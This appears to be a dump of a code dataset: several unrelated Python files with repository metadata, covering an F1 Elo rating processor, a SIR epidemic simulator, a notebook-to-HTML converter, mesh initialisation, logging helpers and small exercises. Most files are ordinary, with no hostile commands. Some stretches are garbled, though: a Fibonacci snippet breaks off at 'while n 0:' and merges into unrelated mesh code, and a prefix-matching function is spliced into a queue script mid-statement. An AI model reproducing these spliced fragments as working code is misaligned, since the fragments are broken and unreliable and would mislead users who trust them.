self.model.constructors[old]\n\n # Regress all powers towards the mean\n # TODO\n\n def _addNewDriversAndConstructors(self, resultsForRace, year):\n for res in resultsForRace:\n if res[\"driverId\"] not in self.model.drivers:\n self.model.drivers[res[\"driverId\"]] = EloDriver(\n self.driversData[res[\"driverId\"]], res[\"constructorId\"])\n if year > 2003:\n self.model.drivers[res[\"driverId\"]\n ].rating = ROOKIE_DRIVER_RATING\n if self.model.drivers[res[\"driverId\"]].constructor is not self.model.constructors[res[\"constructorId\"]]:\n self.model.drivers[res[\"driverId\"]\n ].constructor = self.model.constructors[res[\"constructorId\"]]\n\n def _calculateTrackAlphaAdjustmentAndBestEloAdjustments(self, driverIDs, resultsForRace, circuitId):\n eloAdjustments = ()\n eloAdjustmentsSum = None\n bestAdjustment = 0\n adjustments = [0.9, 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98,\n 0.99, 1, 1.01, 1.02, 1.03, 1.04, 1.05, 1.06, 1.07, 1.08, 1.09, 1.1]\n for alphaAdjustment in adjustments:\n results = {}\n gaElos = {}\n for index, res in enumerate(resultsForRace):\n results[res[\"driverId\"]] = res[\"position\"]\n gaElos[res[\"driverId\"]] = self.model.getGaEloWithTrackAlpha(\n res[\"driverId\"], res[\"grid\"], circuitId, alphaAdjustment)\n curEloAdjustments = self._calculateEloAdjustments(driverIDs, gaElos, results)\n curEloAdjustmentsSum = 0\n curEloAdjustmentsSum += statistics.mean(map(abs, curEloAdjustments[0].values()))\n curEloAdjustmentsSum += statistics.mean(map(abs, curEloAdjustments[1].values()))\n curEloAdjustmentsSum += statistics.mean(map(abs, curEloAdjustments[2].values()))\n\n if not eloAdjustmentsSum or curEloAdjustmentsSum < eloAdjustmentsSum:\n eloAdjustmentsSum = curEloAdjustmentsSum\n eloAdjustments = curEloAdjustments\n bestAdjustment = alphaAdjustment\n return eloAdjustments, bestAdjustment\n\n def _calculateEloAdjustments(self, driverIDs, gaElos, results):\n driverAdjustments = {}\n engineAdjustments = {}\n constructorAdjustments = {}\n for i in range(len(driverIDs)):\n for k in range(i+1, len(driverIDs)):\n if driverIDs[i] not in driverAdjustments:\n driverAdjustments[driverIDs[i]] = 0\n if driverIDs[k] not in driverAdjustments:\n driverAdjustments[driverIDs[k]] = 0\n\n if self.model.drivers[driverIDs[i]].constructor not in constructorAdjustments:\n constructorAdjustments[self.model.drivers[driverIDs[i]].constructor] = 0\n if self.model.drivers[driverIDs[k]].constructor not in constructorAdjustments:\n constructorAdjustments[self.model.drivers[driverIDs[k]].constructor] = 0\n\n if self.model.drivers[driverIDs[i]].constructor.engine not in engineAdjustments:\n engineAdjustments[self.model.drivers[driverIDs[i]\n ].constructor.engine] = 0\n if self.model.drivers[driverIDs[k]].constructor.engine not in engineAdjustments:\n engineAdjustments[self.model.drivers[driverIDs[k]\n ].constructor.engine] = 0\n\n headToHeadResult = 1 if results[driverIDs[i]] < results[driverIDs[k]] else 0\n expectedScore = self.model.getExpectedScore(\n gaElos[driverIDs[i]], gaElos[driverIDs[k]])\n driverAdjustments[driverIDs[i]] += headToHeadResult - expectedScore\n driverAdjustments[driverIDs[k]] += expectedScore - headToHeadResult\n\n constructorAdjustments[self.model.drivers[driverIDs[i]\n ].constructor] += headToHeadResult - expectedScore\n constructorAdjustments[self.model.drivers[driverIDs[k]\n ].constructor] += expectedScore - headToHeadResult\n\n engineAdjustments[self.model.drivers[driverIDs[i]\n ].constructor.engine] += headToHeadResult - expectedScore\n engineAdjustments[self.model.drivers[driverIDs[k]\n ].constructor.engine] += expectedScore - headToHeadResult\n\n return (driverAdjustments, constructorAdjustments, engineAdjustments)\n\n def _adjustEloRatings(self, classified, retired, eloAdjustments, circuitId):\n for driverId in classified:\n self.model.adjustEloRating(\n driverId, eloAdjustments[0][driverId] + FINISHING_BONUS, circuitId)\n for (driverId, _) in retired:\n self.model.adjustEloRating(\n driverId, RETIREMENT_PENALTY, circuitId)\n\n for constructor in eloAdjustments[1]:\n self.model.adjustEloRatingConstructor(\n constructor, eloAdjustments[1][constructor], circuitId)\n\n for engine in eloAdjustments[2]:\n self.model.adjustEloRatingEngine(\n engine, eloAdjustments[2][engine], circuitId)\n\n def _adjustRetirementFactors(self, retired, classified, circuitID):\n const_retirements = {}\n eng_retirements = {}\n all_retirements = []\n \n # Process drivers who were classified in the race\n for driverID in classified:\n if self.model.drivers[driverID].constructor not in const_retirements:\n const_retirements[self.model.drivers[driverID].constructor] = []\n if self.model.drivers[driverID].constructor.engine not in eng_retirements:\n eng_retirements[self.model.drivers[driverID].constructor.engine] = []\n\n all_retirements.append(0)\n self.model.drivers[driverID].retirementProbability *= 1-RETIREMENT_PROBABILITY_CHANGE_DRIVER\n const_retirements[self.model.drivers[driverID].constructor].append(0)\n eng_retirements[self.model.drivers[driverID].constructor.engine].append(0)\n\n # Process drivers who retired from the race \n for (driverID, retirementReason) in retired:\n if self.model.drivers[driverID].constructor not in const_retirements:\n const_retirements[self.model.drivers[driverID].constructor] = []\n if self.model.drivers[driverID].constructor.engine not in eng_retirements:\n eng_retirements[self.model.drivers[driverID].constructor.engine] = []\n\n all_retirements.append(1)\n blame = getRetirementBlame(retirementReason)\n self.model.drivers[driverID].retirementProbability = (3 * blame[0] * RETIREMENT_PROBABILITY_CHANGE_DRIVER) + \\\n (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) * self.model.drivers[driverID].retirementProbability\n const_retirements[self.model.drivers[driverID].constructor].append(blame[1])\n eng_retirements[self.model.drivers[driverID].constructor.engine].append(blame[2])\n\n # Adjust overall retirement factor \n self.model.overallRetirementProbability = statistics.mean(all_retirements) * \\\n RETIREMENT_PROBABILITY_CHANGE_DRIVER + (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) \\\n * self.model.overallRetirementProbability\n \n # Adjust track retirement factors\n if circuitID not in self.model.tracksRetirementFactor:\n self.model.tracksRetirementFactor[circuitID] = BASE_RETIREMENT_PROBABILITY\n oldValue = self.model.tracksRetirementFactor[circuitID]\n self.model.tracksRetirementFactor[circuitID] += (statistics.mean(all_retirements) -\n oldValue) * RETIREMENT_PROBABILITY_CHANGE_TRACK\n \n # Adjust constructor factors\n for constructor, blames in const_retirements.items():\n newValue = statistics.mean(blames)\n constructor.retirementProbability = (3 * newValue * RETIREMENT_PROBABILITY_CHANGE_DRIVER) + \\\n (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) * constructor.retirementProbability\n\n # Adjust engine factors\n for engine, blames in eng_retirements.items():\n newValue = statistics.mean(blames)\n engine.retirementProbability = (3 * newValue * RETIREMENT_PROBABILITY_CHANGE_DRIVER) + \\\n (1-RETIREMENT_PROBABILITY_CHANGE_DRIVER) * engine.retirementProbability\n","repo_name":"villekuosmanen/F1Predict","sub_path":"f1predict/race/DataProcessor.py","file_name":"DataProcessor.py","file_ext":"py","file_size_in_byte":13072,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"48"} +{"seq_id":"41849213485","text":"Max=int(input('输入斐波那契数列的最大项数:'))\n\ndef fab(Max):\n n,a,b=0,0,1\n while n 0:\n# vertices.append((x, y, 50))\n# inh = True\n# inv = True\n# else:\n# vertices.append((x, y, 0))\n# if inv:\n# inv = False\n# edgeVertices.append(vertCount)\n# elif inh:\n# inh = False\n# edgeVertices.append(vertCount)\n# vertCount += 1\n\n# faces = []\n# for y in range(image.height - 1):\n# for x in range(image.width - 1):\n# offset = y * image.width + 1 # vertex index in obj-format starts at 1\n# # relative vertex positions: [u]pper, [l]ower / [l]eft, [r]ight\n# ul, ur, ll, lr = (offset + x, offset + x + 1,\n# offset + image.width + x, offset + image.width + x + 1)\n# # two triangles per square: upper left and lower right\n# faces.append((ul, ur, ll))\n# faces.append((ll, ur, lr))\n\n# verticesToRemove = []\n# for i, v in enumerate(vertices):\n# if v[2] == 0:\n# verticesToRemove.append(i)\n# verticesToRemove = set(verticesToRemove) - set(edgeVertices)\n\n# facesToRemove = []\n# for i, f in enumerate(faces):\n# if set(f).issubset(verticesToRemove):\n# facesToRemove.append(i)\n \n# # verticesToKeep = set(range(len(vertices))) - set(verticesToRemove)\n# # newVertices = [vertices[i] for i in verticesToKeep]\n \n# facesToKeep = set(range(len(faces))) - set(facesToRemove)\n# newFaces = [faces[i] for i in facesToKeep]\n\n# return vertices, newFaces\n\n# def get_back(image, vertices, offset):\n# faces = []\n# for y in range(image.height - 1):\n# for x in range(image.width - 1):\n# offset = y * image.width + 1 # vertex index in obj-format starts at 1\n# # relative vertex positions: [u]pper, [l]ower / [l]eft, [r]ight\n# ul, ur, ll, lr = (offset + x, offset + x + 1,\n# offset + image.width + x, offset + image.width + x + 1)\n# # two triangles per square: upper left and lower right\n# faces.append((ul, ur, ll))\n# faces.append((ll, ur, lr))\n\n# verticesToRemove = []\n# for i, v in enumerate(vertices):\n# if v[2] > 0:\n# verticesToRemove.append(i)\n# verticesToRemove = set(verticesToRemove) - set(edgeVertices)\n\n# facesToRemove = []\n# for i, f in enumerate(faces):\n# if not set(f).isdisjoint(verticesToRemove):\n# facesToRemove.append(i)\n \n# # verticesToKeep = set(range(len(vertices))) - set(verticesToRemove)\n# # newVertices = [vertices[i] for i in verticesToKeep]\n \n# facesToKeep = set(range(len(faces))) - set(facesToRemove)\n# newFaces = [faces[i] for i in facesToKeep]\n\n# newNewFaces = []\n# for f in newFaces:\n# newF = (f[0] + offset, f[1] + offset, f[2] + offset)\n# newNewFaces.append(newF)\n\n# return vertices, newFaces\n\n# def main(im, outpath, scale):\n# im = Image.open(im)#.resize((64,64))\n \n# scale = float(scale)\n# print('Image: size={}x{}, mode={}'.format(*im.size, im.mode))\n# print('Polygon count: {}'.format(2 * (im.width -1) * (im.height - 1)))\n# # vertices = create_vertices(im, scale)\n# # faces = create_faces(im, *im.size)\n# vertices, faces = get_front_and_sides(im)\n# back_v, back_f = get_back(im, len(vertices))\n# vertices = vertices + back_v\n# faces = faces + back_f\n# with open(outpath, 'w') as outfile:\n# for v in vertices:\n# outfile.write('v {} {} {}\\n'.format(*v))\n# for f in faces:\n# outfile.write('f {} {} {}\\n'.format(*f))\n\n# main('data/aloi/sil_grey_256/1/1_r0.png', 'testmesh/out.obj', 1.)\n\nimport numpy as np\nimport torch\n\nclass Initialiser:\n def __init__(self, image, im_dim=256):\n self.visible = (image[0] > 0).astype(int)\n self.objheight, self.top = self.vert()\n self.objwidth, self.left = self.horiz()\n self.im_dim = im_dim\n\n def vert(self):\n rows = []\n for i, row in enumerate(self.visible):\n if np.isin(1, row):\n rows.append(i)\n return rows[len(rows)-1] - rows[0], rows[0]\n\n def horiz(self):\n cols = []\n for i, col in enumerate(np.transpose(self.visible)):\n if np.isin(1, col):\n cols.append(i)\n return cols[len(cols)-1] - cols[0], cols[0]\n\n def initialise(self, mesh, orig_rad = 90):\n width_scale = orig_rad / (self.objwidth/2)\n height_scale = orig_rad / (self.objheight/2)\n\n self.horizontal_scale(mesh, width_scale)\n self.vertical_scale(mesh, height_scale)\n \n orig_top = (self.im_dim/2) - orig_rad/height_scale\n orig_left = (self.im_dim/2) - orig_rad/width_scale\n shift_per_pixel = 1/orig_rad\n horiz_shift = (orig_left - self.left) * shift_per_pixel\n vert_shift = (orig_top - self.top) * shift_per_pixel\n\n self.horizontal_shift(mesh, horiz_shift)\n self.vertical_shift(mesh, vert_shift)\n\n print(\"\\n\")\n print(\"w scale: \", width_scale)\n print(\"orig_rad: \", orig_rad)\n print(\"img left: \", self.left)\n print(\"sphere left: \", orig_left)\n print(\"horiz shift: \", horiz_shift)\n print(\"width per pixel: \", shift_per_pixel)\n print(\"\\n\")\n print(\"h scale: \", height_scale)\n print(\"orig_rad: \", orig_rad)\n print(\"img top: \", self.top)\n print(\"sphere top: \", orig_top)\n print(\"vert shift: \", vert_shift)\n print(\"height per pixel: \", shift_per_pixel)\n print(\"\\n\")\n\n def horizontal_scale(self, mesh, scale):\n x = torch.transpose(mesh.vertices[0], 0, 1)[0]\n x = torch.unsqueeze((x / scale), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,0] = x\n\n def vertical_scale(self, mesh, scale):\n y = torch.transpose(mesh.vertices[0], 0, 1)[1]\n y = torch.unsqueeze((y / scale), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,1] = y\n\n def horizontal_shift(self, mesh, shift):\n x = torch.transpose(mesh.vertices[0], 0, 1)[0]\n x = torch.unsqueeze((x - shift), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,0] = x\n\n def vertical_shift(self, mesh, shift):\n y = torch.transpose(mesh.vertices[0], 0, 1)[1]\n y = torch.unsqueeze((y + shift), 0)\n i = torch.arange(mesh.vertices[0].size(0)).long()\n mesh.vertices[0,i,1] = y","repo_name":"realdingke/L335_project","sub_path":"examples/init_mesh.py","file_name":"init_mesh.py","file_ext":"py","file_size_in_byte":8590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40311972566","text":"#coding=utf-8\n\nimport pandas as pd\n\ndef findlastindexof(ticker,allgp,indexlist):\n for ind in indexlist:\n if allgp['ticker'][ind] == ticker:\n break\n return ind\n\ndef zfrankin(timeperiod,begindate,_tradedate,gc,x=0.5,howlong=90):\n \"\"\"\n 计算股票涨幅排名\n\n Parameters\n ----------\n timeperiod : 排名时间段\n begindate : 交易数据开始时间,最好取早于timeperiod的时间,给非交易日留点缓冲\n _tradedate : 统计结束时间\n gc : 要统计的股票列表\n x : 涨幅标准\n howlong : 次新股标准 \n Examples\n --------\n\n Returns\n -------\n list : 涨幅大于X,上市时间超过howlong的股票列表\n \"\"\"\n allgp = DataAPI.MktEqudAdjGet(beginDate=begindate,endDate=_tradedate,secID=gc,isOpen='1',pandas='1')\n _highest = _turnrate = _ticker = 0\n _lowest = 99999999\n _zfdit ={}\n _ticker = allgp['ticker'].iloc[0]\n _indexlist = sorted(allgp['ticker'].index,reverse=True)\n _tickerlastindex = findlastindexof(_ticker,allgp,_indexlist)\n _tickertime = _tickerlastindex+1\n #print _ticker,_tickerlastindex,len(_indexlist)\n for _r in allgp.iterrows():\n if _ticker != _r[1]['ticker']:\n if(_turnrate > 1):\n _zfdit[_ticker]=[_ticker,_highest/_lowest-1.,_turnrate]\n _ticker = _r[1]['ticker']\n _highest=_turnrate=0\n _lowest=99999999\n _tickerlastindex = findlastindexof(_ticker,allgp,_indexlist)\n _tickertime = _tickerlastindex - _r[0]+1\n if _tickerlastindex - _r[0] > timeperiod:\n continue\n _highest = max(_highest,_r[1]['highestPrice'])\n _lowest = min(_lowest,_r[1]['lowestPrice'])\n _turnrate = _turnrate + _r[1]['turnoverRate']\n zfranklist = [ v for v in sorted(_zfdit.values(),key=lambda x:x[1],reverse=True)]\n zfranklist = [j for (i,j) in enumerate(zfranklist) if j[1] >= x and len(DataAPI.MktEqudAdjGet(endDate=_tradedate,ticker=j[0],isOpen='1',pandas='1'))>howlong]\n return zfranklist\n#zfrankin(10,'20170101','20170208',['000001.XSHE','000002.XSHE'])","repo_name":"fswzb/MT","sub_path":"lib.zfrank.py","file_name":"lib.zfrank.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2784985067","text":"'''\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\nExample 1:\n\nInput: [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\n'''\ndef checkequality(arr,index):\n ch = arr[0][index]\n for i in arr:\n if i[index] != ch:\n return 1\n return 0\n\ndef longestCommonPrefix(strs):\n flag = 0\n prefix = \"\"\n if len(strs) == 0:\n return \"\"\n min_length = len(strs[0])\n for i in strs:\n if len(i) 1:\n q.enqueue(int(line[1]))\n else:\n out.write(str(q.dequeue()) + '\\n')\n\nout.close()\n","repo_name":"shivammehta25/Fun-Coding","sub_path":"EDXCourseITMO/Week2/queue_collections.py","file_name":"queue_collections.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"811345591","text":"import json\nimport time\nimport datetime\nimport os\nfrom termcolor import colored\nimport pandas as pd\n\ndef print_exception(e, addicional_info, logger = None):\n error_type = type(e).__name__\n error_message = e.args[0]\n msg = colored(f'{addicional_info} >> {error_type}: {error_message}', 'red', attrs = ['bold'])\n if logger:\n logger.exception(msg)\n else:\n print(f'[EXCEPTION] {msg}')\n\ndef print_error(message, logger = None):\n msg = colored(message, 'red')\n if logger:\n logger.error(msg)\n else:\n print(f'[ERROR] {msg}')\n\ndef print_info(message, logger = None, color = 'green'):\n msg = colored(message, color)\n if logger:\n logger.info(msg)\n else:\n print(f'[INFO] {msg}')\n\ndef wait_for_file(file_path, timeout = 3600, interval = 1):\n start_time = time.time()\n while not os.path.exists(file_path):\n if time.time() - start_time > timeout:\n raise TimeoutError(f'File {file_path} Not Found After Timeout')\n time.sleep(interval)\n\ndef load_csv_file(file_path, cols = list()):\n if os.path.exists(file_path):\n if cols:\n df = pd.read_csv(file_path, header = None, names = cols)\n else:\n df = pd.read_csv(file_path)\n return df\n return pd.DataFrame()\n\ndef load_file(file_path):\n with open(file_path, 'r') as text_file:\n lines = text_file.readlines()\n lines = [line.rstrip('\\n') for line in lines]\n return lines\n\ndef epoch_to_human_date(epoch_time):\n date = datetime.datetime.fromtimestamp(epoch_time)\n human_readable_date = date.strftime('%Y-%m-%d %H:%M:%S')\n return human_readable_date\n\ndef save_as_json(data, json_file):\n with open(str(json_file), 'w') as fp:\n json.dump(data, fp, indent = 4)\n","repo_name":"Malware-Hunter/SF23-AMGenerator","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15216588801","text":"#!/usr/bin/env python\nfrom __future__ import print_function, absolute_import\n\nDESCRIP = 'Evalaute, write html for `.ipynb` notebook file'\nEPILOG = \\\n\"\"\"\nOpens given NBFILE as notebook. Evaluates, writing output notebook to OUTDIR.\nWrites HTML to OUTDIR.\n\"\"\"\nfrom os.path import join as pjoin, splitext, isdir, split as psplit\n\nimport io\n\nfrom argparse import ArgumentParser, RawDescriptionHelpFormatter\n\n# IPython before and after the big split\ntry:\n from nbformat import read as nb_read, write as nb_write, convert as nb_convert\nexcept ImportError:\n from IPython.nbformat import read as nb_read, write as nb_write, convert as nb_convert\ntry:\n from nbconvert import html\nexcept ImportError:\n from IPython.nbconvert import html\n\nfrom runipy.notebook_runner import NotebookRunner\n\nDEFAULT_TEMPLATE = 'perrinate.tpl'\nDEFAULT_READ_FORMAT = 3\nDEFAULT_WRITE_FORMAT = 3\nHTML_FORMAT = 4\n\n\ndef evaluate_notebook(nb, working_dir=None):\n # Create evaluated version and save it to the dest path.\n nb_runner = NotebookRunner(nb=nb, working_dir=working_dir)\n nb_runner.run_notebook()\n return nb_runner.nb\n\n\ndef nb_to_html(nb, template_name=DEFAULT_TEMPLATE, resources=None):\n \"\"\"convert notebook to html\n \"\"\"\n exporter = html.HTMLExporter(template_file=template_name)\n full_resources = dict(metadata = nb.metadata)\n if resources is not None:\n full_resources.update(resources)\n output, resources = exporter.from_notebook_node(\n nb, resources=full_resources)\n return output\n\n\ndef main():\n parser = ArgumentParser(description=DESCRIP,\n epilog=EPILOG,\n formatter_class=RawDescriptionHelpFormatter)\n parser.add_argument('nbfile', type=str,\n help='notebook file')\n parser.add_argument('outdir', type=str,\n help='directory to output files')\n parser.add_argument('--template', type=str,\n default=DEFAULT_TEMPLATE,\n help='html template name')\n args = parser.parse_args()\n if not isdir(args.outdir):\n raise RuntimeError('{} is not a directory'.format(args.outdir))\n write_ipynb(args.nbfile, args.outdir, template_name=args.template)\n\n\ndef write_ipynb(nb_path, out_dir, template_name=DEFAULT_TEMPLATE):\n fpath, fname = psplit(nb_path)\n froot, ext = splitext(fname)\n with io.open(nb_path, 'rt') as f:\n nb = nb_read(f, DEFAULT_READ_FORMAT)\n nb.metadata['name'] = froot\n nb_evaluated = evaluate_notebook(nb, working_dir=fpath)\n with io.open(pjoin(out_dir, fname), 'wt') as f:\n nb_write(nb, f, DEFAULT_WRITE_FORMAT)\n nb_html = nb_to_html(nb_convert(nb_evaluated, HTML_FORMAT),\n template_name=template_name,\n resources=dict(nb_fname=fname))\n with io.open(pjoin(out_dir, froot + '.html'), 'wb') as f:\n f.write(nb_html.encode('utf-8'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"matthew-brett/perrin-academy","sub_path":"tools/write_ipynb.py","file_name":"write_ipynb.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6050112378","text":"from test.utils import with_random, BaseTest\nimport tri_image.utils as utils\n\n\n#######################################################################\ndef slow(f):\n f.slow = True\n return f\n\n\n#######################################################################\nclass TestEvolver(BaseTest):\n ###################################################################\n def test_constructor(self):\n self.get_evolver()\n\n ###################################################################\n @with_random\n def test_randomlyMoveTriangle(self):\n e = self.get_evolver()\n tri = utils.create_random_triangles(e.size, 1, utils.RGB)[0]\n self.assertEqual(tri.coordinates, [1, 2, 3, 4, 5, 6])\n e.randomly_move_triangle(tri, variance=20)\n\n # the triangle should now have had the center of the triangle\n # moved by some amount, limited to be between -variance, +variance\n self.assertEqual(tri.coordinates, [12, 14, 14, 16, 16, 18])\n","repo_name":"tobynance/tri_image","sub_path":"test/test_evolver.py","file_name":"test_evolver.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14081161246","text":"\"\"\"\nImplements class containing the stochastic simulation logic outlined in the\nfollowing doc: \nhttps://docs.google.com/document/d/18wv_2vcH9tKx1OJ0PpJoI8QZMTSutzX9f44mNKgVS1g/edit#\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n\nclass SIRStochasticSimulation:\n def __init__(self, params):\n\n # Meta-parameters governing the maximum number of days an\n # individual spends in each 'infection' state\n self.max_time_ID = params[\"max_time_ID\"]\n\n # parameters governing distribution over time spent in each\n # of these infection states:\n # Assumptions about the sample_X_times variables:\n # sample_X_times(n) returns a numpy array times of length max_time_X\n # such that times[k] is the number of people who stay in state X\n # for k time periods, and sum(times) == n.\n self.sample_ID_times = params[\"ID_time_function\"]\n\n # assumption: sample_QI_exit_count(n) returns a number m <= n\n # indicating the number of people in the state QI\n # who exit quarantine, given than n people initially\n # start there\n self.sample_QI_exit_count = params[\"sample_QI_exit_function\"]\n self.sample_QS_exit_count = params[\"sample_QS_exit_function\"]\n\n # parameters governing distribution over transition out of\n # each infection state\n self.exposed_infection_p = params[\"exposed_infection_p\"]\n self.contacts_lambda = params[\"expected_contacts_per_day\"]\n\n # parameters governing test protocol\n self.days_between_tests = params[\"days_between_tests\"]\n self.test_pop_fraction = params[\"test_population_fraction\"]\n self.test_QFNR = params[\"test_protocol_QFNR\"]\n self.test_QFPR = params[\"test_protocol_QFPR\"]\n\n # parameters governing contact tracing\n self.perform_contact_tracing = params[\"perform_contact_tracing\"]\n self.contact_tracing_c = params[\"contact_tracing_constant\"]\n\n # flag governing meaning of the pre-ID state\n\n # parameters governing initial state of simulation\n self.pop_size = params[\"population_size\"]\n self.init_ID_count = params[\"initial_ID_count\"]\n\n self.init_S_count = self.pop_size - self.init_ID_count\n assert self.init_S_count >= 0\n\n # instantiate state variables and relevant simulation variables\n self.reset_initial_state()\n\n def reset_initial_state(self):\n self.S = self.init_S_count\n self.ID = self.sample_ID_times(self.init_ID_count)\n self.QS = 0\n self.QI = 0\n self.R = 0\n\n var_labels = self.get_state_vector_labels()\n self.sim_df = pd.DataFrame(columns=var_labels)\n self._append_sim_df()\n self.current_day = 0\n self.last_test_day = -1\n\n def run_new_trajectory(self, T):\n self.reset_initial_state()\n for _ in range(T):\n self.step()\n return self.sim_df\n\n def run_contact_trace(self, new_QI):\n raise (Exception(\"not supported\"))\n leave_E = min(sum(self.E), new_QI * self.contact_tracing_c)\n new_QI = int(self.exposed_infection_p * leave_E)\n new_QS = leave_E - new_QI\n self.QS = self.QS + new_QS\n self.QI = self.QI + new_QI\n\n idx = self.max_time_E - 1\n while leave_E > 0:\n leave_E_idx = min(self.E[idx], leave_E)\n self.E[idx] -= leave_E_idx\n leave_E -= leave_E_idx\n idx -= 1\n\n def run_test(self):\n \"\"\" execute one step of the testing logic \"\"\"\n # infectious_test_pop = free_infectious * self.test_pop_fraction\n # fluid_new_QI = infectious_test_pop * (1 - self.test_QFNR)\n\n # the probability that a free infected individual is quarantined\n # on this round of testing\n new_QI_p = self.test_pop_fraction * (1 - self.test_QFNR)\n\n # sample the number of free infected people who end up quarantined\n # first from the exposed state -- multiply by exposed_infection_p to account for uncertain\n # nature of infection status in the E group\n new_QI_from_ID = np.random.binomial(self.ID, new_QI_p)\n\n # probability a free-susceptible person becomes quarantined\n new_QS_p = self.test_pop_fraction * self.test_QFPR\n # sample number of free susceptible people who become quarantined\n new_QS_from_S = np.random.binomial(self.S, new_QS_p)\n\n self.ID = self.ID - new_QI_from_ID\n self.S = self.S - new_QS_from_S\n\n new_QI = sum(new_QI_from_ID)\n self.QI = self.QI + new_QI\n\n new_QS = new_QS_from_S\n self.QS = self.QS + new_QS\n\n if self.perform_contact_tracing:\n self.run_contact_trace(new_QI)\n\n def step(self):\n \"\"\" simulate a single day in the progression of the disease \"\"\"\n\n # do testing logic first\n if (\n self.current_day - self.last_test_day >= self.days_between_tests\n or self.last_test_day == -1\n ):\n self.last_test_day = self.current_day\n self.run_test()\n\n free_infectious = 0\n free_infectious += sum(self.ID)\n # free_infectious += sum(self.E) * self.exposed_infection_p\n\n free_susceptible = self.S\n\n # simulate new exposures between free infectious & free susceptible:\n free_tot = free_infectious + free_susceptible + self.R\n\n poisson_param = (\n free_infectious * self.contacts_lambda * free_susceptible / free_tot\n )\n\n n_contacts = min(np.random.poisson(poisson_param), self.S)\n new_ID = np.random.binomial(n_contacts, self.exposed_infection_p)\n\n # resolve ID queue\n new_R = self.ID[0]\n\n # sample number of people who leave quarantine\n leave_QI = self.sample_QI_exit_count(self.QI)\n new_R += leave_QI\n\n new_S = self.sample_QS_exit_count(self.QS)\n\n # update relevant state variables:\n self.S = self.S + new_S - new_ID\n self.R += new_R\n\n self.QI -= leave_QI\n self.QS -= new_S\n\n # update array-based state variables\n self._shift_array_state_variables()\n self.ID = self.ID + self.sample_ID_times(new_ID)\n\n self._append_sim_df()\n\n self.current_day += 1\n\n def _append_sim_df(self):\n data = self.get_current_state_vector()\n labels = self.get_state_vector_labels()\n new_row_df = pd.DataFrame([data], columns=labels)\n self.sim_df = self.sim_df.append(new_row_df, ignore_index=True)\n if sum(data) != self.pop_size:\n raise (Exception(\"population has shrunk\"))\n\n def _shift_array_state_variables(self):\n idx = 0\n while idx <= self.max_time_ID - 2:\n self.ID[idx] = self.ID[idx + 1]\n idx += 1\n self.ID[self.max_time_ID - 1] = 0\n\n def get_current_state_vector(self):\n return np.concatenate([[self.S], [self.QS], [self.QI], [self.R], self.ID])\n\n def get_state_vector_labels(self):\n return [\"S\", \"QS\", \"QI\", \"R\"] + [\n \"ID_{}\".format(x) for x in range(self.max_time_ID)\n ]\n","repo_name":"saitcakmak/BoRisk","sub_path":"BoRisk/test_functions/covid_simulators/sir_stochastic_sim.py","file_name":"sir_stochastic_sim.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"10508308625","text":"import re\n\nwith open(\"day2.input\") as f:\n data = f.readlines()\n\n# \"7-10 m: qmpgmmsmmmmkmmkj\"\npat = re.compile(\"^([0-9]+)-([0-9]+) (\\S): (.*)$\")\n\n# Part 1\nvalid_count = 0\nfor line in data:\n m = pat.match(line)\n if not m:\n raise Exception(\"Bad match\", line)\n occurrences = m.group(4).count(m.group(3))\n if int(m.group(1)) <= occurrences <= int(m.group(2)):\n valid_count += 1\nprint(valid_count)\n\n# Part 2\nvalid_count = 0\nfor line in data:\n m = pat.match(line)\n if not m:\n raise Exception(\"Bad match\", line)\n p1, p2, ch, pw = int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)\n if (pw[p1 - 1] == ch) != (pw[p2 - 1] == ch):\n valid_count += 1\nprint(valid_count)\n","repo_name":"Jemgoss/adventofcode","sub_path":"2020/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21034052744","text":"from setuptools import setup\nimport subprocess\nfrom typing import List\n\n\ndef find_version(filename: str = \"version\") -> str:\n \"\"\"Parse the version and build details stored in the 'version' file.\"\"\"\n try:\n cmd: List[str] = [\"git\", \"describe\", \"--tags\", \"--always\", \"HEAD\"]\n gitversion: str = subprocess.check_output(\n cmd, stderr=subprocess.DEVNULL\n ).decode().strip()\n build: List[str] = gitversion.split(\"-\")\n # -- (e.g. 0.2-8-adfebee)\n if len(build) > 1:\n return \"{}.post{}\".format(build[0], build[1])\n\n # tagged commit\n return gitversion\n except subprocess.CalledProcessError:\n # If .git does not exist, default to an old dev version\n return 